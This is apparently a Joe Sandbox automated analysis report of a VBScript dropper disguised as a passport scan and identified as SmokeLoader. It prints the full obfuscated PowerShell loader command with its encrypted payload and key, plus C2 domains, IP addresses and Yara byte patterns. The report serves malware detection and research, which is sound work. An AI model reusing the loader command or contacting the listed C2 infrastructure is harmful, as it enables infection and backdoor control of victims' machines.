Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs

Overview

General Information

Sample name:#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs
renamed because original name is a hash value
Original sample name:-i .vbs
Analysis ID:1578026
MD5:dd180ea4a76b4ac987ffc4f4cb42e5ee
SHA1:645da4bd0a0cc94694fde162126e8dd62208168b
SHA256:ea0a7467efc74d7a947774d83d440426510243bd4b443391f753902bf275c86c
Tags:vbsuser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6768 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2868 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function raNdD($EzfV){return -split ($EzfV -replace '..', '0x$& ')};$UNmWG = raNdD('153622473F3D34B5890B52ECDE322F45E48AC8AA1EBE0731587B2A8D1EB5D7236A3C8B617FAE24809377210FCDAA8256B284412DD11EC0B51122B1EF9F3232128A30DA876225B23A0A21033A7E42AB95CC5ACD28D3BAC87A3C04863F7224792517962091F8B92DF84D8699F4A63BB1EACD4E7F895F70B40175EDCBD0858EC7333AE6A1AB73D0F0C2C360B3826EBCACACB9561C41AF524F59C7FE7200CFE0C18E7CBE012252D4DA348D9867636DE8BE7309771296CCEA63DC8A00F1A6607291A9D940AC0FBE016E1469B44FFC93FB881EE1B5B55931B83474C09BA7D8326E069F30F7EF3AD15149CE314DEBF42606E2068557F79F77A379EAF734C27C2D3B854DBC0DC2752FBB6A8E67A31EF7EC67BD5A9B6BBC6B643AC644B7231B34788E58522EE2FF086384D09C1974CF97199996486FD9081C9C03779BC054D7DBD1AE0F032973099215905B2991EEDE39D374557E6BF7E27D2284AB23157862E2CBB4C7F31D6EA0F0594CBE9A410EBAA90180045174CFB119CD292B770AC51A76BD48FEDA376633D5D95F3C12FCD9A75FDD9D0DBDE8551877FA8C38E86B9D006E2A51E2D327743DB0EBECEA698C101441CF173D4614D44DAA2F4802C84FA83BDCB67CCFB31C07AB202A98C6B54200BBAEE17899ED11E5B03E97ADD428647A41B73BF380058DE3A0F98E978F9B83CAB3C28FE019C43A7BB0D040D5CCD700B059F3734BD804AE813EC4E10D1EA58FCBB0EC6C4C8CDE60CD35C6D4012EECE60D1A1EB2466BE1E327B203A6FEADD590E2D7A77C218709D3259C666B281C8D292197492CB5078DC69512F5FE4EA4467A62B291A42BF5576D12E86AAA0AFEB464D865F88ADAAB7D71DEBE3FE860AA8D5C1DC08F163020FD6DF7298ABF82642D73139A20C305891AC189D3EBB5DE86DD02CABDB425F68BC4');$cvlPy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((raNdD('5A456A634B52506273785A52424C5375')),[byte[]]::new(16)).TransformFinalBlock($UNmWG,0,$UNmWG.Length)); & $cvlPy.Substring(0,3) $cvlPy.Substring(3) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • putty.exe (PID: 1664 cmdline: "C:\Users\user\AppData\Roaming\putty.exe" MD5: C02B57E6771A13513DC087F6B45ADAB0)
        • explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • daersgt (PID: 2236 cmdline: C:\Users\user\AppData\Roaming\daersgt MD5: C02B57E6771A13513DC087F6B45ADAB0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://constractionscity1991.lat/", "http://restructurisationservice.ru/", "http://connecticutproperty.ru/"]}
SourceRuleDescriptionAuthorStrings
00000004.00000002.1493799106.0000000000631000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000004.00000002.1493799106.0000000000631000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x204:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000007.00000002.1730637355.00000000005D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000007.00000002.1730637355.00000000005D0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x604:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      00000004.00000002.1493715526.0000000000600000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      Click to see the 10 entries
      SourceRuleDescriptionAuthorStrings
      4.3.putty.exe.610000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        4.2.putty.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          7.2.daersgt.5c0e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            7.3.daersgt.5d0000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              4.2.putty.exe.600e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                Click to see the 1 entries

                System Summary

                barindex
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs", ProcessId: 6768, ProcessName: wscript.exe
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function raNdD($EzfV){return -split ($EzfV -replace '..', '0x$& ')};$UNmWG = raNdD('153622473F3D34B5890B52ECDE322F45E48AC8AA1EBE0731587B2A8D1EB5D7236A3C8B617FAE24809377210FCDAA8256B284412DD11EC0B51122B1EF9F3232128A30DA876225B23A0A21033A7E42AB95CC5ACD28D3BAC87A3C04863F7224792517962091F8B92DF84D8699F4A63BB1EACD4E7F895F70B40175EDCBD0858EC7333AE6A1AB73D0F0C2C360B3826EBCACACB9561C41AF524F59C7FE7200CFE0C18E7CBE012252D4DA348D9867636DE8BE7309771296CCEA63DC8A00F1A6607291A9D940AC0FBE016E1469B44FFC93FB881EE1B5B55931B83474C09BA7D8326E069F30F7EF3AD15149CE314DEBF42606E2068557F79F77A379EAF734C27C2D3B854DBC0DC2752FBB6A8E67A31EF7EC67BD5A9B6BBC6B643AC644B7231B34788E58522EE2FF086384D09C1974CF97199996486FD9081C9C03779BC054D7DBD1AE0F032973099215905B2991EEDE39D374557E6BF7E27D2284AB23157862E2CBB4C7F31D6EA0F0594CBE9A410EBAA90180045174CFB119CD292B770AC51A76BD48FEDA376633D5D95F3C12FCD9A75FDD9D0DBDE8551877FA8C38E86B9D006E2A51E2D327743DB0EBECEA698C101441CF173D4614D44DAA2F4802C84FA83BDCB67CCFB31C07AB202A98C6B54200BBAEE17899ED11E5B03E97ADD428647A41B73BF380058DE3A0F98E978F9B83CAB3C28FE019C43A7BB0D040D5CCD700B059F3734BD804AE813EC4E10D1EA58FCBB0EC6C4C8CDE60CD35C6D4012EECE60D1A1EB2466BE1E327B203A6FEADD590E2D7A77C218709D3259C666B281C8D292197492CB5078DC69512F5FE4EA4467A62B291A42BF5576D12E86AAA0AFEB464D865F88ADAAB7D71DEBE3FE860AA8D5C1DC08F163020FD6DF7298ABF82642D73139A20C305891AC189D3EBB5DE86DD02CABDB425F68BC4');$cvlPy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((raNdD('5A456A634B52506273785A52424C5375')),[byte[]]::new(16)).TransformFinalBlock($UNmWG,0,$UNmWG.Length)); & $cvlPy.Substring(0,3) $cvlPy.Substring(3), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function raNdD($EzfV){return -split ($EzfV -replace '..', '0x$& ')};$UNmWG = raNdD('153622473F3D34B5890B52ECDE322F45E48AC8AA1EBE0731587B2A8D1EB5D7236A3C8B617FAE24809377210FCDAA8256B284412DD11EC0B51122B1EF9F3232128A30DA876225B23A0A21033A7E42AB95CC5ACD28D3BAC87A3C04863F7224792517962091F8B92DF84D8699F4A63BB1EACD4E7F895F70B40175EDCBD0858EC7333AE6A1AB73D0F0C2C360B3826EBCACACB9561C41AF524F59C7FE7200CFE0C18E7CBE012252D4DA348D9867636DE8BE7309771296CCEA63DC8A00F1A6607291A9D940AC0FBE016E1469B44FFC93FB881EE1B5B55931B83474C09BA7D8326E069F30F7EF3AD15149CE314DEBF42606E2068557F79F77A379EAF734C27C2D3B854DBC0DC2752FBB6A8E67A31EF7EC67BD5A9B6BBC6B643AC644B7231B34788E58522EE2FF086384D09C1974CF97199996486FD9081C9C03779BC054D7DBD1AE0F032973099215905B2991EEDE39D374557E6BF7E27D2284AB23157862E2CBB4C7F31D6EA0F0594CBE9A410EBAA90180045174CFB119CD292B770AC51A76BD48FEDA376633D5D95F3C12FCD9A75FDD9D0DBDE8551877FA8C38E86B9D006E2A51E2D327743DB0EBECEA698C101441CF173D4614D44DAA2F4802C84FA83BDCB67CCFB31C07AB202A98C6B54200BBAEE17899ED11E5B03E97ADD428647A41B73BF380058DE3A0F98E978F9B83CAB3C28FE019C43A7BB0D040D5CCD700B059F3734BD804AE813EC4E10D1EA58FCBB0EC6C4C8CDE60CD35C6D4012EECE60D1A1EB24
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\daersgt, CommandLine: C:\Users\user\AppData\Roaming\daersgt, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\daersgt, NewProcessName: C:\Users\user\AppData\Roaming\daersgt, OriginalFileName: C:\Users\user\AppData\Roaming\daersgt, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Users\user\AppData\Roaming\daersgt, ProcessId: 2236, ProcessName: daersgt
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2868, TargetFilename: C:\Users\user\AppData\Roaming\putty.exe
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs", ProcessId: 6768, ProcessName: wscript.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function raNdD($EzfV){return -split ($EzfV -replace '..', '0x$& ')};$UNmWG = raNdD('153622473F3D34B5890B52ECDE322F45E48AC8AA1EBE0731587B2A8D1EB5D7236A3C8B617FAE24809377210FCDAA8256B284412DD11EC0B51122B1EF9F3232128A30DA876225B23A0A21033A7E42AB95CC5ACD28D3BAC87A3C04863F7224792517962091F8B92DF84D8699F4A63BB1EACD4E7F895F70B40175EDCBD0858EC7333AE6A1AB73D0F0C2C360B3826EBCACACB9561C41AF524F59C7FE7200CFE0C18E7CBE012252D4DA348D9867636DE8BE7309771296CCEA63DC8A00F1A6607291A9D940AC0FBE016E1469B44FFC93FB881EE1B5B55931B83474C09BA7D8326E069F30F7EF3AD15149CE314DEBF42606E2068557F79F77A379EAF734C27C2D3B854DBC0DC2752FBB6A8E67A31EF7EC67BD5A9B6BBC6B643AC644B7231B34788E58522EE2FF086384D09C1974CF97199996486FD9081C9C03779BC054D7DBD1AE0F032973099215905B2991EEDE39D374557E6BF7E27D2284AB23157862E2CBB4C7F31D6EA0F0594CBE9A410EBAA90180045174CFB119CD292B770AC51A76BD48FEDA376633D5D95F3C12FCD9A75FDD9D0DBDE8551877FA8C38E86B9D006E2A51E2D327743DB0EBECEA698C101441CF173D4614D44DAA2F4802C84FA83BDCB67CCFB31C07AB202A98C6B54200BBAEE17899ED11E5B03E97ADD428647A41B73BF380058DE3A0F98E978F9B83CAB3C28FE019C43A7BB0D040D5CCD700B059F3734BD804AE813EC4E10D1EA58FCBB0EC6C4C8CDE60CD35C6D4012EECE60D1A1EB2466BE1E327B203A6FEADD590E2D7A77C218709D3259C666B281C8D292197492CB5078DC69512F5FE4EA4467A62B291A42BF5576D12E86AAA0AFEB464D865F88ADAAB7D71DEBE3FE860AA8D5C1DC08F163020FD6DF7298ABF82642D73139A20C305891AC189D3EBB5DE86DD02CABDB425F68BC4');$cvlPy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((raNdD('5A456A634B52506273785A52424C5375')),[byte[]]::new(16)).TransformFinalBlock($UNmWG,0,$UNmWG.Length)); & $cvlPy.Substring(0,3) $cvlPy.Substring(3), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function raNdD($EzfV){return -split ($EzfV -replace '..', '0x$& ')};$UNmWG = raNdD('153622473F3D34B5890B52ECDE322F45E48AC8AA1EBE0731587B2A8D1EB5D7236A3C8B617FAE24809377210FCDAA8256B284412DD11EC0B51122B1EF9F3232128A30DA876225B23A0A21033A7E42AB95CC5ACD28D3BAC87A3C04863F7224792517962091F8B92DF84D8699F4A63BB1EACD4E7F895F70B40175EDCBD0858EC7333AE6A1AB73D0F0C2C360B3826EBCACACB9561C41AF524F59C7FE7200CFE0C18E7CBE012252D4DA348D9867636DE8BE7309771296CCEA63DC8A00F1A6607291A9D940AC0FBE016E1469B44FFC93FB881EE1B5B55931B83474C09BA7D8326E069F30F7EF3AD15149CE314DEBF42606E2068557F79F77A379EAF734C27C2D3B854DBC0DC2752FBB6A8E67A31EF7EC67BD5A9B6BBC6B643AC644B7231B34788E58522EE2FF086384D09C1974CF97199996486FD9081C9C03779BC054D7DBD1AE0F032973099215905B2991EEDE39D374557E6BF7E27D2284AB23157862E2CBB4C7F31D6EA0F0594CBE9A410EBAA90180045174CFB119CD292B770AC51A76BD48FEDA376633D5D95F3C12FCD9A75FDD9D0DBDE8551877FA8C38E86B9D006E2A51E2D327743DB0EBECEA698C101441CF173D4614D44DAA2F4802C84FA83BDCB67CCFB31C07AB202A98C6B54200BBAEE17899ED11E5B03E97ADD428647A41B73BF380058DE3A0F98E978F9B83CAB3C28FE019C43A7BB0D040D5CCD700B059F3734BD804AE813EC4E10D1EA58FCBB0EC6C4C8CDE60CD35C6D4012EECE60D1A1EB24
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function raNdD($EzfV){return -split ($EzfV -replace '..', '0x$& ')};$UNmWG = raNdD('153622473F3D34B5890B52ECDE322F45E48AC8AA1EBE0731587B2A8D1EB5D7236A3C8B617FAE24809377210FCDAA8256B284412DD11EC0B51122B1EF9F3232128A30DA876225B23A0A21033A7E42AB95CC5ACD28D3BAC87A3C04863F7224792517962091F8B92DF84D8699F4A63BB1EACD4E7F895F70B40175EDCBD0858EC7333AE6A1AB73D0F0C2C360B3826EBCACACB9561C41AF524F59C7FE7200CFE0C18E7CBE012252D4DA348D9867636DE8BE7309771296CCEA63DC8A00F1A6607291A9D940AC0FBE016E1469B44FFC93FB881EE1B5B55931B83474C09BA7D8326E069F30F7EF3AD15149CE314DEBF42606E2068557F79F77A379EAF734C27C2D3B854DBC0DC2752FBB6A8E67A31EF7EC67BD5A9B6BBC6B643AC644B7231B34788E58522EE2FF086384D09C1974CF97199996486FD9081C9C03779BC054D7DBD1AE0F032973099215905B2991EEDE39D374557E6BF7E27D2284AB23157862E2CBB4C7F31D6EA0F0594CBE9A410EBAA90180045174CFB119CD292B770AC51A76BD48FEDA376633D5D95F3C12FCD9A75FDD9D0DBDE8551877FA8C38E86B9D006E2A51E2D327743DB0EBECEA698C101441CF173D4614D44DAA2F4802C84FA83BDCB67CCFB31C07AB202A98C6B54200BBAEE17899ED11E5B03E97ADD428647A41B73BF380058DE3A0F98E978F9B83CAB3C28FE019C43A7BB0D040D5CCD700B059F3734BD804AE813EC4E10D1EA58FCBB0EC6C4C8CDE60CD35C6D4012EECE60D1A1EB2466BE1E327B203A6FEADD590E2D7A77C218709D3259C666B281C8D292197492CB5078DC69512F5FE4EA4467A62B291A42BF5576D12E86AAA0AFEB464D865F88ADAAB7D71DEBE3FE860AA8D5C1DC08F163020FD6DF7298ABF82642D73139A20C305891AC189D3EBB5DE86DD02CABDB425F68BC4');$cvlPy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((raNdD('5A456A634B52506273785A52424C5375')),[byte[]]::new(16)).TransformFinalBlock($UNmWG,0,$UNmWG.Length)); & $cvlPy.Substring(0,3) $cvlPy.Substring(3), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function raNdD($EzfV){return -split ($EzfV -replace '..', '0x$& ')};$UNmWG = raNdD('153622473F3D34B5890B52ECDE322F45E48AC8AA1EBE0731587B2A8D1EB5D7236A3C8B617FAE24809377210FCDAA8256B284412DD11EC0B51122B1EF9F3232128A30DA876225B23A0A21033A7E42AB95CC5ACD28D3BAC87A3C04863F7224792517962091F8B92DF84D8699F4A63BB1EACD4E7F895F70B40175EDCBD0858EC7333AE6A1AB73D0F0C2C360B3826EBCACACB9561C41AF524F59C7FE7200CFE0C18E7CBE012252D4DA348D9867636DE8BE7309771296CCEA63DC8A00F1A6607291A9D940AC0FBE016E1469B44FFC93FB881EE1B5B55931B83474C09BA7D8326E069F30F7EF3AD15149CE314DEBF42606E2068557F79F77A379EAF734C27C2D3B854DBC0DC2752FBB6A8E67A31EF7EC67BD5A9B6BBC6B643AC644B7231B34788E58522EE2FF086384D09C1974CF97199996486FD9081C9C03779BC054D7DBD1AE0F032973099215905B2991EEDE39D374557E6BF7E27D2284AB23157862E2CBB4C7F31D6EA0F0594CBE9A410EBAA90180045174CFB119CD292B770AC51A76BD48FEDA376633D5D95F3C12FCD9A75FDD9D0DBDE8551877FA8C38E86B9D006E2A51E2D327743DB0EBECEA698C101441CF173D4614D44DAA2F4802C84FA83BDCB67CCFB31C07AB202A98C6B54200BBAEE17899ED11E5B03E97ADD428647A41B73BF380058DE3A0F98E978F9B83CAB3C28FE019C43A7BB0D040D5CCD700B059F3734BD804AE813EC4E10D1EA58FCBB0EC6C4C8CDE60CD35C6D4012EECE60D1A1EB24
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-19T07:52:49.065957+010020391031A Network Trojan was detected192.168.2.74978394.156.177.5180TCP
                2024-12-19T07:52:51.206518+010020391031A Network Trojan was detected192.168.2.74978994.156.177.5180TCP
                2024-12-19T07:52:53.487820+010020391031A Network Trojan was detected192.168.2.749795194.85.61.7680TCP
                2024-12-19T07:54:00.441115+010020391031A Network Trojan was detected192.168.2.74994294.156.177.5180TCP
                2024-12-19T07:54:03.144228+010020391031A Network Trojan was detected192.168.2.74994894.156.177.5180TCP
                2024-12-19T07:54:04.581776+010020391031A Network Trojan was detected192.168.2.749954194.85.61.7680TCP
                2024-12-19T07:54:06.175514+010020391031A Network Trojan was detected192.168.2.74996094.156.177.5180TCP
                2024-12-19T07:54:08.128574+010020391031A Network Trojan was detected192.168.2.74996394.156.177.5180TCP
                2024-12-19T07:54:09.441073+010020391031A Network Trojan was detected192.168.2.749968194.85.61.7680TCP
                2024-12-19T07:54:11.175490+010020391031A Network Trojan was detected192.168.2.74997394.156.177.5180TCP
                2024-12-19T07:54:12.675463+010020391031A Network Trojan was detected192.168.2.74997794.156.177.5180TCP
                2024-12-19T07:54:14.128609+010020391031A Network Trojan was detected192.168.2.749981194.85.61.7680TCP
                2024-12-19T07:54:17.175722+010020391031A Network Trojan was detected192.168.2.74998494.156.177.5180TCP
                2024-12-19T07:54:18.878603+010020391031A Network Trojan was detected192.168.2.74998594.156.177.5180TCP
                2024-12-19T07:54:20.242204+010020391031A Network Trojan was detected192.168.2.749986194.85.61.7680TCP
                2024-12-19T07:54:22.441086+010020391031A Network Trojan was detected192.168.2.74998794.156.177.5180TCP
                2024-12-19T07:54:23.926065+010020391031A Network Trojan was detected192.168.2.74998894.156.177.5180TCP
                2024-12-19T07:54:25.441252+010020391031A Network Trojan was detected192.168.2.749989194.85.61.7680TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-19T07:52:51.206518+010028518151A Network Trojan was detected192.168.2.74978994.156.177.5180TCP
                2024-12-19T07:52:53.487820+010028518151A Network Trojan was detected192.168.2.749795194.85.61.7680TCP
                2024-12-19T07:54:11.175490+010028518151A Network Trojan was detected192.168.2.74997394.156.177.5180TCP
                2024-12-19T07:54:18.878603+010028518151A Network Trojan was detected192.168.2.74998594.156.177.5180TCP
                2024-12-19T07:54:20.242204+010028518151A Network Trojan was detected192.168.2.749986194.85.61.7680TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: C:\Users\user\AppData\Roaming\daersgtAvira: detection malicious, Label: HEUR/AGEN.1306978
                Source: C:\Users\user\AppData\Roaming\putty.exeAvira: detection malicious, Label: HEUR/AGEN.1306978
                Source: 00000007.00000002.1730637355.00000000005D0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://constractionscity1991.lat/", "http://restructurisationservice.ru/", "http://connecticutproperty.ru/"]}
                Source: #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsReversingLabs: Detection: 21%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\daersgtJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\putty.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\putty.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                Software Vulnerabilities

                barindex
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49795 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49783 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.7:49795 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49789 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.7:49789 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49948 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49942 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49960 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49968 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49977 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49963 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49989 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49986 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49981 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49987 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49984 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.7:49986 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49973 -> 94.156.177.51:80
